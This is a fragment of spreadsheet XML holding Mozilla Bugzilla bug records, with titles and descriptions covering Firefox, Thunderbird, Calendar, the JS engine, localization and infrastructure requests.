    <t>jrobinso</t>
  </si>
  <si>
    <t>MOZILLA.ORG-390375</t>
  </si>
  <si>
    <t>CVS: Administration</t>
  </si>
  <si>
    <t>Checkin comment not including bug number.</t>
  </si>
  <si>
    <t>The checkin I made for bug 280959 didn't include a reference to the bug number. The checkins are:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=jst%25mozilla.org&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2007-07-25+21%3A14%3A00&amp;maxdate=2007-07-25+21%3A15%3A00&amp;cvsroot=%2Fcvsroot
Please add the bug number to the commit message for that set of checkins.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-250781</t>
  </si>
  <si>
    <t>Add Quote Colors extension for TB/Moz</t>
  </si>
  <si>
    <t>Thanks for adding my extension to update.mozilla.org:
Name: Quote Colors
Homepage: http://quotecolors.mozdev.org
Author: Malte RÃ¼cker
Email: malte@6thfloor.de
Description: This extension allows you to configure text and background colors
for different quote levels in mail/news messages.
*** Thunderbird version compatible with version 0.7 (works up to version 0.9
at least it defined so in install.rdf)
Version: 0.2
Release date: 2004-06-27
URL to xpi package:
 http://downloads.mozdev.org/quotecolors/quotecolors.xpi
Size: 12 KB
*** Mozilla compatible version it has been tested with versions 1.5 to 1.7.
Version: 0.1c
Release date: 2004-05-08
xpi package:
 http://downloads.mozdev.org/quotecolors/quotecolors-moz.xpi
Size: 14 KB
Sorry if I missed anything important.</t>
  </si>
  <si>
    <t>malte</t>
  </si>
  <si>
    <t>CALENDAR-479577</t>
  </si>
  <si>
    <t>Alarms</t>
  </si>
  <si>
    <t>Creating event/task with alarm on end/due date throws exception NS_ERROR_OBJECT_IS_IMMUTABLE in calAlarmUtils.jsm no alarm dialog is displayed</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20090220 Calendar/1.0pre (BuildID: 20090220070000)
Steps to Reproduce:
1. Start Sunbird with new profile
2. Open the new task dialog
3. Choose Reminder &gt; Custom... to open the Reminders dialog
4. Add new reminder 15 minutes before the task ends and press OK
5. Enable Due Date and set it to a date/time some minutes before current time
6. Press the Save and Close toolbar button
Actual Results:
The task is saved but no Alarm dialog is displayed. Error Console shows:
[[[
Error: [Exception... 'Can not modify immutable data container' when calling method: [calIAlarm::related]  nsresult: 0x80460002 (NS_ERROR_OBJECT_IS_IMMUTABLE)  location: JS frame :: file:///E:sunbird/modules/calAlarmUtils.jsm :: cal_alarm_calculateAlarmDate :: line 80  data: no]
STACK: 
1: [file:///E:sunbird/calendar-js/calUtils.js:1218] notifyFunc
2: [file:///E:sunbird/calendar-js/calUtils.js:1221] calListenerBag_notify
3: [file:///E:sunbird/calendar-js/calStorageCalendar.js:497] anonymous
4: [file:///E:sunbird/calendar-js/calStorageCalendar.js:445] anonymous
5: [null:0] null
6: [file:///E:sunbird/calendar-js/calTransactionManager.js:202] cT_doTransaction
7: [null:0] null
8: [file:///E:sunbird/calendar-js/calTransactionManager.js:71] cTM_createAndCommitTxn
9: [null:0] null
10: [chrome://calendar/content/calendar-item-editing.js:417] doTransaction
Source File: file:///E:sunbird/calendar-js/calUtils.js Line: 1218
]]]
Expected Results:
Task is saved and the Alarm dialog is displayed because the alarm is in the past.
Additional Information:
Same error happens if you enable the due date before setting the reminder or if you set the due date to a future date/time.</t>
  </si>
  <si>
    <t>ssitter</t>
  </si>
  <si>
    <t>FIREFOX-921942</t>
  </si>
  <si>
    <t>Session Restore</t>
  </si>
  <si>
    <t>Scroll position isn't restored in background tabs after session restore</t>
  </si>
  <si>
    <t>With Firefox set to restore the current windows and tabs:
- Open any web page A and scroll down the page a bit
- Open another web page B in another tab also scroll down a bit
- Make sure tab B is the current/active one then restart Firefox
- Notice that the scroll position on tab B has been restored correctly whereas the scroll position on tab A (background tab) isn't restored
This is with Firefox 25 beta 3. The same issue happens with a brand new profile.</t>
  </si>
  <si>
    <t>ttaubert</t>
  </si>
  <si>
    <t>ahmadsamir3891</t>
  </si>
  <si>
    <t>CORE-517580</t>
  </si>
  <si>
    <t>Make JS_HAS_GETTER_SETTER always 1 remove support for old-style getters and setters</t>
  </si>
  <si>
    <t>ES5 is codifying getters and setters in the standard it doesn't quite seem worth the overhead of maintaining the #ifdef.  (I haven't even thought of how I might do that for Object.defineProperty and it's not immediately obvious how the algorithm might be modified to respect it although admittedly this is only first-glance thinking.)  One exception: require JS_HAS_GETTER_SETTER in order to include the __(lookup|define)[GS]etter__ methods in Object.prototype people who may have wanted to avoid non-standard methods shouldn't be provided them while people who had it enabled before won't want them to go away without having any choice in the matter.</t>
  </si>
  <si>
    <t>jwalden</t>
  </si>
  <si>
    <t>FIREFOX_FOR_METRO_GRAVEYARD-916383</t>
  </si>
  <si>
    <t>Firefox Start</t>
  </si>
  <si>
    <t>FIREFOX_FOR_METRO_GRAVEYARD</t>
  </si>
  <si>
    <t>Invisible autocomplete items selectable by keyboard when your results not shown</t>
  </si>
  <si>
    <t>STR:
- Type some letters in the url bar and see items populated in your results section of autocomplete popup
- Keep typing garbage until your results is empty.
- Press down key multiple times and notice that once you've iterated through every item you have to press the down key multiple times to cycle through.
When we detect that there was no results we just hide the grid keeping whatever was there last. Those ghost items are still selectable by keyboard.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-75991</t>
  </si>
  <si>
    <t>miscstats needs to work with bonsai and bugzilla on separate servers</t>
  </si>
  <si>
    <t>The script called mozilla/webtools/miscstats/genstats.cgi assumes that bonsai
and bugzilla are on the same server.  Now that bugzilla is moving to a new
server this script has to be updated to take that into account.
The quick and dirty solution is to run this script on both servers with each
script generating only the statistics for its own server.
The one correct solution(TM) is to give each server access to the other's mysql
installation but this requires thinking through the security issues involved.
Since Bugzilla is moving to the new server today I'm going to implement the
quick and dirty solution for the moment.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-415682</t>
  </si>
  <si>
    <t>ta / Tamil</t>
  </si>
  <si>
    <t>[ta] Firefox ta release tracker</t>
  </si>
  <si>
    <t>This is a tracker bug for releasing Firefox 3 ta.
This bug is not that detailed but as we get particular work items they should block this bug for tracking and better discoverability.
Blocking this on the decision what we do with Tamil regarding Firefox 2 marking that dependency.</t>
  </si>
  <si>
    <t>TOOLKIT-485985</t>
  </si>
  <si>
    <t>Places</t>
  </si>
  <si>
    <t>test_history_sidebar should take in count DST correction when adding visits</t>
  </si>
  <si>
    <t>Created attachment 370054
patch v1.0
i hate DST.
Test has started failing here (we applied DST yesterday) due to the fact we subtract too much from today's time.</t>
  </si>
  <si>
    <t>mak77</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-110818</t>
  </si>
  <si>
    <t>irt.org - DHTML/JS content is outdated.</t>
  </si>
  <si>
    <t>This is a very popular site (linked to by About.com) where many people learn
DHTML and Javascript.
Unfortunately much of the code listed is for layers etc. and doesn't work well
with gecko based browsers.  The content needs to be updated to work with DOM.
The longer this site continues to have it's bad content the more sites out
there will use the bad content.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-124178</t>
  </si>
  <si>
    <t>GFX</t>
  </si>
  <si>
    <t>Hang on DHTML [reflow/painting]</t>
  </si>
  <si>
    <t>a new window opens and a few secons later mozilla hangs.
Doesn't hang in mozilla0.9.7
using 2002020603 on win-xp</t>
  </si>
  <si>
    <t>dcone</t>
  </si>
  <si>
    <t>markushuebner</t>
  </si>
  <si>
    <t>FIREFOX-399065</t>
  </si>
  <si>
    <t>Firefox crashes when pop-up window is closed via self.close() or window close button (red X)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
A child window is opened using Javascript window.open(). When this window is closed using either the OS'es red X button or call to Javascript self.close().  This is not universally true -- some factor in the test code (in the example URL) is doubtless responsible.  (I will be spending some time isolating this factor -- it's killing my app and I want it to stop!)
BTW: I've tested this with Windows and it does not cause crash.
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.pemburn.com/poptest/index.html
2. Click the Edit button
3. When window pops up close it with Cancel button
Actual Results:  
Firefox crashes
Expected Results:  
Window should close</t>
  </si>
  <si>
    <t>CORE-121489</t>
  </si>
  <si>
    <t>Networking: File</t>
  </si>
  <si>
    <t>nsIFile does not return null when top of volume is reached</t>
  </si>
  <si>
    <t>286 /**
287 * Parent will be null when this is at the top of the volume.
288 */
289 readonly attribute nsIFile parent
Looking at nsLocalFileUnix and nsLocalFileWin that's not true in those impls.
In particular the parent of / on unix is /.  Not sure what the parent is on
Win exactly.  Could we fix the comment or the impls please?  I just got into
an infinite loop because of this (was walking up the dir tree and assumed that
I would hit null when I hit the top).</t>
  </si>
  <si>
    <t>CORE-173408</t>
  </si>
  <si>
    <t>Bug fix for Ethiopic Number Conversion Algorithm</t>
  </si>
  <si>
    <t>The existing algorithm in mozilla trips over certain cases where large numbers
have big sequences of zeros and doesn't always remove superfluous '1's when it
should.  A patch is provided to fix this along with a test page.</t>
  </si>
  <si>
    <t>smontagu</t>
  </si>
  <si>
    <t>yacob</t>
  </si>
  <si>
    <t>BUGZILLA-318715</t>
  </si>
  <si>
    <t>iCalendar Buglist doesn't include deadline</t>
  </si>
  <si>
    <t>iCalendar is all about times deadlines are times if there's a deadline that really should be in the iCalendar :).</t>
  </si>
  <si>
    <t>selsky</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-496264</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG</t>
  </si>
  <si>
    <t>Merge fox2mike's bugzilla accounts</t>
  </si>
  <si>
    <t>fox2mike has two bugzilla accounts and would like to merge them:
* fox2mike@gmail.com
* shyam@mozilla.com</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-429874</t>
  </si>
  <si>
    <t>Product Site</t>
  </si>
  <si>
    <t>Link to (or describe) how to customize shortcuts on Keyboard Shortcuts page</t>
  </si>
  <si>
    <t>Since people ask about this a lot and seem to think it's on that page we should link to the directions from the Keyboard Shortcuts page.
Not sure how to write this though...</t>
  </si>
  <si>
    <t>samuel.sidler+old</t>
  </si>
  <si>
    <t>MOZILLA.ORG-266552</t>
  </si>
  <si>
    <t>CVS Account for Jon Gund (Helping Aaron Leventhal to develop test suites for caret behavior)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20040910
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20040910
Helping Aaron Leventhal to develop test suites for caret behavior
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>mozillamarcia.knous</t>
  </si>
  <si>
    <t>jongund</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-339926</t>
  </si>
  <si>
    <t>Update Find page for styles etc.</t>
  </si>
  <si>
    <t>There are a few small fixes for this page: missing  styles some typos some fixes for consistency of terminology across the site.  I had a patch for this sititng in my folder.</t>
  </si>
  <si>
    <t>SEAMONKEY-108629</t>
  </si>
  <si>
    <t>Active Accessibility: implement support for menubar menus menuitems</t>
  </si>
  <si>
    <t>We need to expose menu information using the MSAA API.</t>
  </si>
  <si>
    <t>aaronlev</t>
  </si>
  <si>
    <t>CORE-338756</t>
  </si>
  <si>
    <t>ecma/TypeConversion/9.3.1-3.js FAILS</t>
  </si>
  <si>
    <t>-s2 == -Infinity || -s2 == -1.7976931348623157e+308  
expected: true actual: false reason: wrong value</t>
  </si>
  <si>
    <t>crowderbt</t>
  </si>
  <si>
    <t>BUGZILLA-38854</t>
  </si>
  <si>
    <t>reports.cgi needs to escape (untrusted) url params</t>
  </si>
  <si>
    <t>note that reports.cgi has several output modes so this needs to be fixed for 
all modes.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-275207</t>
  </si>
  <si>
    <t xml:space="preserve">Request for CVS write access for Matthew Willis </t>
  </si>
  <si>
    <t>I'm requesting CVS write access for mozilla/calendar and
mozilla/toolkit/themes/pinstripe</t>
  </si>
  <si>
    <t>mattwillis</t>
  </si>
  <si>
    <t>TOOLKIT-368205</t>
  </si>
  <si>
    <t>Crash Reporting</t>
  </si>
  <si>
    <t>sync up with breakpad svn (again)</t>
  </si>
  <si>
    <t>Just like bug 360938 we should resync the code in Mozilla CVS with the code in Airbag's SVN.  We'll get the OS X client bits this time.</t>
  </si>
  <si>
    <t>CORE-361273</t>
  </si>
  <si>
    <t>Assert fail: cg-&gt;stackDepth &gt;= 0 at jsemit.c:164</t>
  </si>
  <si>
    <t>In low memory conditions it's possible to get the following assertion failure reported (stack trace will follow shortly):
Assertion failure: cg-&gt;stackDepth &gt;= 0 at jsemit.c:164
The root cause is this error handling in jsemit:
#define EMIT_ATOM_INDEX_OP(op atomIndex)                                     \
    JS_BEGIN_MACRO                                                            \
        if (!EmitAtomIndexOp(cx op atomIndex cg) &lt; 0)                      \
            return JS_FALSE                                                  \
    JS_END_MACRO
EmitAtomIndexOp returns a JSBool so any error returned will actually be ignored by mistake leading to the assert fail later.
In a release build we get stack underflow reported when the compiled script is run and JS_ArenaAllocate can get itself into an infinite loop that only exits when malloc fails (more details on this soon).</t>
  </si>
  <si>
    <t>gavin.reaney</t>
  </si>
  <si>
    <t>CORE-230933</t>
  </si>
  <si>
    <t>Networking: Cookies</t>
  </si>
  <si>
    <t>move cookies to mozstorage</t>
  </si>
  <si>
    <t>spin off from bug 178993. To store http-only we need to change the format of
cookies.txt. But we can't for compatibility reasons. So a new file needs to be
created.
And to do it right it should allow more attributes to be saved like last use time.
very short summary of ideas so far:
- just add httponly and last use time
- add a few more unassinged fields to be used later. (bools and int)
- make the format flexible store what mozilla knows about and merge when
saving not to lose data.
- Should have versioning cookies2.txt has a versioned filename
- Maintain cookies.txt to be used by older mozillae
read bug 178993 for more details.</t>
  </si>
  <si>
    <t>CORE-79680</t>
  </si>
  <si>
    <t>need to land bidi addition string Index: xpfe/browser/resources/locale/en-US/navigator.dtd</t>
  </si>
  <si>
    <t>ftang</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-487699</t>
  </si>
  <si>
    <t>spreadfirefox.com</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD</t>
  </si>
  <si>
    <t>Move the image module back onto the stable 5.x-1.x branch</t>
  </si>
  <si>
    <t>Were having problems with the image gallery module to try and resolve these problems can we bring the image_gallery module back onto the 5.x-1.x branch.
Currently the image_gallery has been upgraded to 5.x-2.0-alpha3
Best Paul</t>
  </si>
  <si>
    <t>buchanae+bugs</t>
  </si>
  <si>
    <t>THUNDERBIRD-431217</t>
  </si>
  <si>
    <t>Message Compose Window</t>
  </si>
  <si>
    <t>Send button should be disabled until we have a recipient</t>
  </si>
  <si>
    <t>From SM Bug 104973 â€“ Send button should be disabled until we have a recipient</t>
  </si>
  <si>
    <t>vseerror</t>
  </si>
  <si>
    <t>CORE-458928</t>
  </si>
  <si>
    <t>Canvas: 2D</t>
  </si>
  <si>
    <t>drawWindow() does not render Flash content when scale is not 100%</t>
  </si>
  <si>
    <t>Created attachment 342108
test case (requires signed.applets.codebase_principal_support = true)
On Windows Flash content is rendered by drawWindow() when wmode is set to transparent or opaque.  However if the canvas scale is less than or greater than 100% the Flash content is not rendered.
I created a test case based on the test case for bug 313462.  The test at the bottom of the page (50% wmode=transparent) is identical to the other wmode=transparent test except I added this call before drawWindow():
  cx.scale(0.5 0.5)
Nothing is drawn when the scale is set to a value other than 1.0.</t>
  </si>
  <si>
    <t>brade</t>
  </si>
  <si>
    <t>CORE-377303</t>
  </si>
  <si>
    <t>Document Navigation</t>
  </si>
  <si>
    <t>[FIX]Make nsIDocShellTreeItem inherit from nsIDocShellTreeNode</t>
  </si>
  <si>
    <t>This would allow consumers to start using just nsIDocShellTreeItem in their code until we can just merge nsIDocShellTreeNode into nsIDocShellTreeItem.</t>
  </si>
  <si>
    <t>TOOLKIT-396034</t>
  </si>
  <si>
    <t>Restart  to use message replaces description after Use theme</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows 98 ru) Opera 9.23
Build Identifier: http://download.mozilla.org/?product=thunderbird-2.0.0.6&amp;os=win&amp;lang=ru
In Tools / Plugins / Themes switch from current theme to other theme (press Use theme button) and immediately switch back (press Use theme for current theme). Until Plugins window will be reopened it will show restart TB message for current theme.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>arkady.belousov</t>
  </si>
  <si>
    <t>CALENDAR-461337</t>
  </si>
  <si>
    <t>Sunbird tinderboxen need more disk space to stay green</t>
  </si>
  <si>
    <t>Sunbird (but not Lightning) tinderboxen are aflame on Linux &amp; Windows see http://tinderbox.mozilla.org/showbuilds.cgi?tree=Sunbird&amp;hours=24</t>
  </si>
  <si>
    <t>gozer</t>
  </si>
  <si>
    <t>antoine.mechelynck</t>
  </si>
  <si>
    <t>CORE-189077</t>
  </si>
  <si>
    <t>Make nsImageFrame smaller</t>
  </si>
  <si>
    <t>nsImageFrame has 6 PRPackedBool member variables. We can save a little space by
concerting them into a single variable and using its bits as truth values instead.</t>
  </si>
  <si>
    <t>hjtoi-bugzilla</t>
  </si>
  <si>
    <t>FIREFOX-327340</t>
  </si>
  <si>
    <t>No keyboard-accessible way to sort columns in Places results list</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060214 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060214 Firefox/1.6a1
The results list in Places is sortable.  Clicking a column header sorts by that column clicking again reverses the sort order.  There is no way to sort the results list with the keyboard.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>pilgrim</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-262828</t>
  </si>
  <si>
    <t>Update extension: LocalLink</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 rv:1.7.3) Gecko/20040924 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 rv:1.7.3) Gecko/20040924 Firefox/0.10.1
Author: Michael J. Gruber 
Extension name: LocalLink
Version: 0.1
Home page: http://locallink.mozdev.org
XPI install link: http://downloads.mozdev.org/locallink/locallink-0.1.xpi
Target application: Mozilla Firefox 0.8 - 1.0
Description: Open local URLs (file://) from any webpage.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>mozilla+bugzilla</t>
  </si>
  <si>
    <t>WEB_COMPATIBILITY-379193</t>
  </si>
  <si>
    <t>WEB_COMPATIBILITY</t>
  </si>
  <si>
    <t>abc.go.com - new video player does not work in Gecko browsers except Firefox</t>
  </si>
  <si>
    <t>Reproducibility: Always
Steps to Reproduce:
1. Go to http://abc.go.com/
2. Click on the WATCH ABC SHOWS ONLINE NOW button
Expected Results: Video player starts or the plugin is installed
Actual results: The page says the video player is only available for IE Firefox and Safari
Adding Firefox/3 to general.useragent.extra.seamonkey works around the annoyance page but the install for the plugin doesn't work in SeaMonkey.</t>
  </si>
  <si>
    <t>CORE-384037</t>
  </si>
  <si>
    <t xml:space="preserve">Crash [@ nsIFrame::IsBoxFrame] with </t>
  </si>
  <si>
    <t>Created attachment 267985
testcase (crashes Firefox when loaded)</t>
  </si>
  <si>
    <t>THUNDERBIRD-297619</t>
  </si>
  <si>
    <t>Build Thunderbird with gcc 4.0 on Mac</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b2) Gecko/20050613 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b2) Gecko/20050613 Firefox/1.0+
We need to be able to compile Thunderbird using gcc 4.0 on the Mac.  gcc 4.0 is
the default compiler in Xcode 2 shipping with Mac OS X 10.4.  This is the first
Thunderbird-specific step needed for MacOSX86 support.
Official Mozilla builds must continue using gcc 3.3.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CORE-14043</t>
  </si>
  <si>
    <t>for loop parsing error</t>
  </si>
  <si>
    <t>The following is legal JavaScript and should not generate a syntax error:
js&gt; for (var x=1y=2 x&lt;10 x++ y--) {print(x=+x+ y=+y)}
4: missing  after for-loop initializer:
4: for (var x=1y=2 x&lt;10 x++ y--) {print(x=+x+ y=+y)}
4: ............^
This error breaks the JS test shell.
    Waldemar</t>
  </si>
  <si>
    <t>rogerl</t>
  </si>
  <si>
    <t>waldemar</t>
  </si>
  <si>
    <t>CORE-156764</t>
  </si>
  <si>
    <t>Interface hangs after clicking onto a tooltip</t>
  </si>
  <si>
    <t>Sometimes when moving the mouse to a bookmark in the personal toolbar a
tooltip appears but doesn't disappear (maybe I'm too fast?). When I accidentally
click onto this tooltip it disappears but the whole UI hangs (can't click onto
any buttons or menu). Only the local window hangs the only option remaining is
to close it and open a new one.</t>
  </si>
  <si>
    <t>jag+mozilla</t>
  </si>
  <si>
    <t>chtephan</t>
  </si>
  <si>
    <t>TOOLKIT-347583</t>
  </si>
  <si>
    <t>Theme preview on Linux has incorrect background color and mgr. lists don't have borders</t>
  </si>
  <si>
    <t>screenshots and patch coming up</t>
  </si>
  <si>
    <t>CORE-129789</t>
  </si>
  <si>
    <t>Layout: Form Controls</t>
  </si>
  <si>
    <t>[XBLFC] reserve space for scrollbar  with less than N options</t>
  </si>
  <si>
    <t>A  which has fewer then N s will not show a
(disabled) scrollbar [Nav4x behaviour) nor does it reserve space on the right
hand side for the scrollbar (IE5x behaviour). If elements are added by script
to the select so that the number of elements exceeds the 'size=N' then the
layout of the page must be adjusted for the addition of the now required
scrollbar. [See testcase.]
[Comments based on testing with 2002030710 trunk build classic skin win2k
XBL Form Controls enabled unless otherwise noted. madhur: could you test this
on the full matrix (Classic|Modern) X (win32|MacOS9|MacOSX|Linux) and update
this bug with the status on those platform/skin combinations.  Thanks.]</t>
  </si>
  <si>
    <t>jrgmorrison</t>
  </si>
  <si>
    <t>FIREFOX-331414</t>
  </si>
  <si>
    <t>Accelerate keys conflict in bookmark organizer window.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.8) Gecko/20050607 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.9a1) Gecko/20060322 Firefox/1.6a1
Accelerate keys conflict.
Reproducible: Always
Steps to Reproduce:
1. Launch firefox and expand Bookmarks menu.
2. Select Organize Bookmarks menu to open the bookmark manage window.
3. Press Alt+F to expand File menu in this popup window.
Actual Results:  
New folder window will popup instead of expanding File menu. This leads to fail opening top menu File in this window.
Expected Results:  
There should not be two command with same accelerate key.
This bug can be reproduced on Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.9a1) Gecko/20060322 Firefox/1.6a1. 
System info:
Sun Blade 100 SNV_35/Vermilion_07.</t>
  </si>
  <si>
    <t>CORE-189740</t>
  </si>
  <si>
    <t>Printing: Output</t>
  </si>
  <si>
    <t>[ps] Adding CID support Check Code to postscript should be closed when TrueType printing is disabled</t>
  </si>
  <si>
    <t>Now the CID support Check Code will be added to postscript if freetype is
enabled. The most Linux users (their systems have freetype) who don't enable
TrueType printing will still have these checking code in postscript when printing.
bstell: will the CID checking code stop the printing process if the printer
doesn't support CID? If answer is yes I think the patch should be applied if
answer is no the current code is ok.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-511282</t>
  </si>
  <si>
    <t>run fennec unittests on intel linux machines</t>
  </si>
  <si>
    <t>on change then change the n810s to run on nightlies.
This would apply to m-c m-1.9.2 and tm currently.
Adding more linux slaves to deal with the added load would be the Right Thing To Do.</t>
  </si>
  <si>
    <t>aki</t>
  </si>
  <si>
    <t>FIREFOX-233899</t>
  </si>
  <si>
    <t>Deletion of non-contiguous cookies leaves holes in Cookie Manager</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040206 Firefox/0.8
In the Cookie Manager (Tools-&gt;Options...-&gt;Privacy-&gt;Cookies-&gt;Stored Cookies...)
when selecting (with the Ctrl+Click key combo.) and deleting a non-contiguous
(not next to each other) series of cookies the Cookie Manager leaves the
remaining cookies chosen with the Ctrl+click in the UI position they were in
before the deletion of the selected cookies.   It is expected that the list of
cookies would be consolidated (i.e. filling the holes created by deleting
intervening cookies).  
Reproducible: Always
Steps to Reproduce:
Assuming multiple cookies have been set in the browser.
1.Click on Tools-&gt;Options...-&gt;Privacy-&gt;Cookies-&gt;Stored Cookies...
2.Select two or more non-contiguous cookies.
3.Click 'Remove Cookie'.
Actual Results:  
The first cookie is deleted and the list of cookies is reformatted to close the
space created.  The second (and subsequent) cookies chosen (by means of the
Ctrl+click method) are also deleted (as far as I can tell) but the Cookie
Manager UI-listing of the spaces created by the deleted cookie are not closed
(i.e. follow-on cookies are not moved to fill the spaces).
Expected Results:  
Cookies selected by means of the Ctrl+click non-contiguous selection method
should have their spaces occupied by the remaining cookies (if any) after the
user chooses 'Remove Cookie'.</t>
  </si>
  <si>
    <t>mconnor</t>
  </si>
  <si>
    <t>dasnyderx</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-454176</t>
  </si>
  <si>
    <t>cy / Welsh</t>
  </si>
  <si>
    <t>[cy] Firefox 3 RSS reader setup for Welsh</t>
  </si>
  <si>
    <t>RSS readers are web services allowing users to subscribe to RSS feeds online and view them. If Firefox detects a feed it offers the user to subscribe to it either as a live bookmark or via one of the web services.
The current RSS Readers in en-US are Bloglines My Yahoo Google.
We want to ship a good set of defaults for Welsh and will work towards that in three stages.
First the localization team and Stas (Stas Malolepszy) will look at the market for the language and come up with a good candidates. Dewy we'll need your input on this the guidelines for making recommendations are on http://wiki.mozilla.org/Firefox_web_services_guidelines. After we decided on a particular RSS reader Stas will contact the owner and ask for permission. undefined we'll likely need your help to at least get the contact information.
Once we have a specification on what the set of RSS readers for Welsh should look like the localization team and Axel will work on an implementation on that. This should happen by the localization team creating and attaching patches for the desired changes and requesting review from Axel. After a successful review the localization team will land them. If you're not feeling comfortable with creating those changes ask Axel to help out.
Please don't commit any modifications in l10n/cy/browser/chrome/browser-region/region.properties to the cvs repository without a patch reviewed by Axel Stas or someone else appointed by Stas/SethB. The data here is sensitive to users and our search partners thus the extra care here.</t>
  </si>
  <si>
    <t>NSS-324744</t>
  </si>
  <si>
    <t>add generation of policy extensions to certutil</t>
  </si>
  <si>
    <t>certutil currently does not know how to add Policy Policy Constraints or Inhibit-any-policy extensions when generating certificates .
For the purpose of full coverage testing of libpkix we should add this ability
to certutil .</t>
  </si>
  <si>
    <t>neil.williams</t>
  </si>
  <si>
    <t>julien.pierre</t>
  </si>
  <si>
    <t>BUGZILLA-343566</t>
  </si>
  <si>
    <t>Testing Suite</t>
  </si>
  <si>
    <t>Runtests test 004template.t fails on some systems with a complaint about RELATIVE</t>
  </si>
  <si>
    <t>This seems to be a relative of bug 329295 but addint . or ./ to PATH does not help.
On some systems $file (in t/004) has a leading ./ that causes trouble.  Filtering that out seems to help the situation.</t>
  </si>
  <si>
    <t>bugreport</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-433315</t>
  </si>
  <si>
    <t>clean-up mozilla2 configs + steps</t>
  </si>
  <si>
    <t>With debug+leak tests being enabled on mozilla-central very soon the master.cfg and some steps have gotten a little ugly. This bug is to track cleaning them up and making them more maintainable. bug 429670 may end up as a dependent - more investigation is needed first.
Some of the clean up will involve simplifying the code in buildbotcustom.steps.test.py and removing conditionals in the master.cfg.
Another idea I have is to put the 'BRANCHES' array into a separate file.
Ideas/input are welcomed.</t>
  </si>
  <si>
    <t>bhearsum</t>
  </si>
  <si>
    <t>TOOLKIT-482585</t>
  </si>
  <si>
    <t>XUL Widgets</t>
  </si>
  <si>
    <t>[FIX]Chrome styles cause all content HTML class changes to restyle</t>
  </si>
  <si>
    <t>We have some rules in xul.css that match all nodes in the HTML namespace with a given class name.  This means that any change to a class attribute in any webpage triggers a restyle of that node.  I discovered this when removing the reftest-wait class caused a full restyle of my reftest and actually changed the rendering in the process.
I see a few obvious fixes here:
1)  Restrict the styles to the input/textarea elements we really want to match
    here.  This still means they'll affect web pages though (e.g. a content
    HTML input with the right class will trigger the styles).
2)  Move the rules into (non-themed) scoped stylesheets in the relevant XBL
    widgets.
I'm really tempted to do the latter.  Any obvious issues with it?</t>
  </si>
  <si>
    <t>CORE-363817</t>
  </si>
  <si>
    <t>XBL</t>
  </si>
  <si>
    <t>Change nsVoidArray nsBindingManager::mAttachedStack to use nsTArray &gt;</t>
  </si>
  <si>
    <t>Currently AddRef/Release is handled manually when adding and removing objects to/from mAttachedStack. That is error prone.
And nsVoidArray is marked as obsolete: http://wiki.mozilla.org/Gecko:Obsolete_API
This is similar to bug 350030.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-431511</t>
  </si>
  <si>
    <t>de / German</t>
  </si>
  <si>
    <t>German version: Access keys: Extras -&gt; P assigned twice for Passwort-Manager and PopUp-Manager</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de-AT rv:1.8.1.13) Gecko/20080313 SeaMonkey/1.1.9
